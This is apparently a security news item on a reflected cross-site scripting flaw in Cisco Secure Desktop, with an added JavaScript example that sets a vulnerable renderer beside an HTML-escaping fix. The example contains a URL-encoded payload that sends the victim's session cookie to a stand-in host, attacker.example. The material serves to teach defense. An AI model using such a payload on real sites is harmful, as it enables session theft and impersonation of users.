Core Security issued an advisory disclosing a vulnerability that could affect large numbers of organizations using Cisco’s Secure Desktop security package and leave users of the product open to potential Cross-Site Scripting (XSS) attacks.
Affected versions of Cisco Secure Desktop mishandle certain browser requests, and the resulting XSS flaw lets an attacker target the product's end users with crafted links or forms. Cross-site scripting can be used for everything from stealing credentials for IT systems to tricking people into visiting fraudulent phishing and malware-distribution sites.
Cisco Secure Desktop is marketed as a multifunctional component of the Cisco SSL VPN appliance solution, with onboard capabilities for host scan checks, desktop encryption, cache cleaning, and both keystroke logger and host emulation detection.
Cisco issued an update to Secure Desktop that addresses the vulnerability (CSCsw15646) on Feb. 1, 2010. The company also released an updated version of the product that does not include the reported XSS flaw. Researcher Matias Pablo Brutti is credited with discovering the Cisco Secure Desktop vulnerability.
The Cisco Secure Desktop web application does not sufficiently verify that a POST request submitted by a user is well formed before processing it, and reflects the submitted data into the response page. The result is a remotely exploitable XSS vulnerability.
For the vulnerability to be exploited, the Secure Desktop feature must be enabled on the affected Cisco appliance.
The vulnerability was confirmed in Cisco Secure Desktop version 3.4.2048 and may also affect older versions of the product. It does not affect Cisco Secure Desktop version 3.5.841.
XSS vulnerabilities allow an attacker to execute arbitrary script code in the context of a user's browser, within the vulnerable application's origin. For example, an attacker could exploit an XSS vulnerability to steal the user's session cookies (and then impersonate the legitimate user) or inject a fraudulent form that asks for credentials in order to gain access to the user's systems. The flaw arises whenever user-supplied data is written into a page without output encoding appropriate to the context in which it is displayed.
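The following is an added example, not code from Cisco, Core Security, or the advisory. It shows the general mechanism the two preceding paragraphs describe: a POST parameter reflected into HTML without encoding, next to the hardened rendering. The parameter name `username`, the page layout, and the host `attacker.example` are assumptions for illustration; the advisory does not name the vulnerable parameter or page.

```javascript
// Added example (not Cisco's or Core Security's code): reflected XSS from an
// unencoded POST parameter, beside the hardened rendering.
// ASSUMPTIONS: the parameter name "username", the greeting markup and the
// host "attacker.example" are illustrative and not taken from the advisory.

// Constructed input: the body of an application/x-www-form-urlencoded POST
// carrying a cookie-stealing payload in the "username" field.
const CONSTRUCTED_POST_BODY =
  'username=%3Cscript%3Edocument.location%3D%22http%3A%2F%2Fattacker.example' +
  '%2F%3Fc%3D%22%2Bdocument.cookie%3C%2Fscript%3E';

// Decode a form-encoded body into a plain object of parameter -> value.
function parseFormBody(body) {
  return Object.fromEntries(new URLSearchParams(body).entries());
}

// Vulnerable handler: the submitted value goes straight into the markup,
// so an attacker-controlled "username" becomes live script in the victim's
// browser, running in the application's origin.
function renderVulnerable(params) {
  return `<p>Welcome back, ${params.username}</p>`;
}

// Encode the characters that are significant in an HTML text or attribute
// context. This is the minimum needed for output placed between tags or
// inside a quoted attribute; other contexts (JavaScript, URL, CSS) need
// their own encoders.
function escapeHtml(value) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
  return String(value).replace(/[&<>"']/g, (c) => map[c]);
}

// Hardened handler: same page, but the value is encoded for the HTML text
// context it is written into, so the payload is displayed, not executed.
function renderHardened(params) {
  return `<p>Welcome back, ${escapeHtml(params.username)}</p>`;
}

// Optional input validation in front of the renderer: reject requests whose
// "username" is not well formed. Output encoding is still required; an
// allow-list only narrows what reaches the page.
function isWellFormedUsername(value) {
  return typeof value === 'string' && /^[A-Za-z0-9._-]{1,64}$/.test(value);
}

// Crude check used to compare the two renderings: does the page contain an
// executable <script> tag after processing?
function containsScriptTag(html) {
  return /<script[\s>]/i.test(html);
}

// Stand-alone demonstration.
const params = parseFormBody(CONSTRUCTED_POST_BODY);
console.log('well-formed:', isWellFormedUsername(params.username)); // false
console.log('vulnerable :', renderVulnerable(params));
console.log('hardened   :', renderHardened(params));
```

The fix a practitioner wants here is the encoder at the output sink, chosen for the context the data lands in; the allow-list check is defense in depth, as are an `HttpOnly` flag on the session cookie and a Content Security Policy, none of which replace output encoding.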